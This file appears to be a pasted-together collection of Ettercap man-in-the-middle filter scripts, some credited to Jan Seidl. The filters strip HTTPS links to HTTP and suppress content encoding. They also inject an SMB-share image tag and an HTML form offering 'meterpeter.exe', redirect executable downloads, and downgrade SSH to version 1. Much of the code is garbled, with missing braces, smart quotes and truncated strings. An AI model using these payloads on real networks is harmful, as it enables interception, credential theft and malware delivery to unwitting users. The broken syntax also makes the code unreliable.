

# #
# HTTP Request/Response Filter -- hrf.ef -- filter source file #
# #
# by Jan Seidl (based on code from ALoR & NaGA) #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #

# This filter will substitute the word 'https' with 'http' on
# both HTTP requests and responses.
# based on the discussion (and contained code) on forum thread

## Zap Content Encoding ##
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("[HTTP Response Filter] Encoding zapped.\n");

## Replace Content ##

# Requests
if (ip.proto == TCP && tcp.dst == 80) {
  # msg("[HTTP Response Filter] HTTP request seen.\n");
   if (search(, "https")){
      replace("https", "http");
      msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n");
   if (search(, "https")){
      replace("https", "http");
      msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n");

# Response
if (ip.proto == TCP && tcp.src == 80) {
  # msg("[HTTP Response Filter] HTTP response seen.\n");
   if (search(, "https")){
      replace("https", "http");
      msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n");
   if (search(, "https")){
      replace("https", "http");
      msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n");


if (ip.proto == TCP && tcp.dst == 80) {
   if (search(, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as orig$
      msg("zapped Accept-Encoding!\n");

if (ip.proto == TCP && tcp.src == 80) {
   replace("", "");
   msg("Filter Ran.\n");

\uFEFFif (ip.proto == TCP && tcp.dst == 80) {
   if (search(, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-gnidocnE");
       # note: replacement string is same length as original string
      msg("Encoding Taken Care Of...\n");
if (ip.proto == TCP && tcp.src == 80) {
replace("head>", "head> <img src=\"\\\\\\share\\pixel.gif\"> ");
msg("Replacement Filter Ran.\n");

if (ip.proto == TCP && tcp.dst == 80) {
if (search(, “Accept-Encoding”)) {
replace(“Accept-Encoding”, “Accept-Mousecat”);
msg(“zapped Accept-Encoding!\n”);
if (ip.proto == TCP && tcp.src == 80) {
replace(“keep-alive”, “close” “);
replace(“Keep-Alive”, “close” “);
if (ip.proto == TCP && search(, “: application”) ){
msg(“found EXE\n”);
if (search(, “Win32″)) {
msg(“doing nothing\n”);
} else {
replace(“200 OK”, “301 Moved Permanently
msg(“redirect success\n”);


if (ip.proto == TCP && tcp.dst == 80) {
    if (search(, "Accept-Encoding")) {
           replace("Accept-Encoding", "Accept-Nothing!");

if (ip.proto == TCP && tcp.src == 80) {
      if (search(, "<title>")) {
           replace("</title>", "</title>
 action="" method="link"><img src=""><INPUT TYPE=submit value="DOWNLOAD meterpeter.exe"></form>

<h10>just some instructions</h10></body></html>");
           msg("html injected");


if (tcp.src == 21 && search(, "ProFTPD")) {


if (ip.proto == TCP) {
if (tcp.src == 22) {
if ( replace("SSH-1.99", "SSH-1.51") ) {
msg("[SSH Filter] SSH downgraded from version 2 to 1\n");
} else {
if ( search(, "SSH-2.00") ) {
msg("[SSH Filter] Server supports only SSH version 2\n");
} else {
if ( search(, "SSH-1.51") ) {
msg("[SSH Filter] Server already supports only version 1\n");

其他的 等待你补充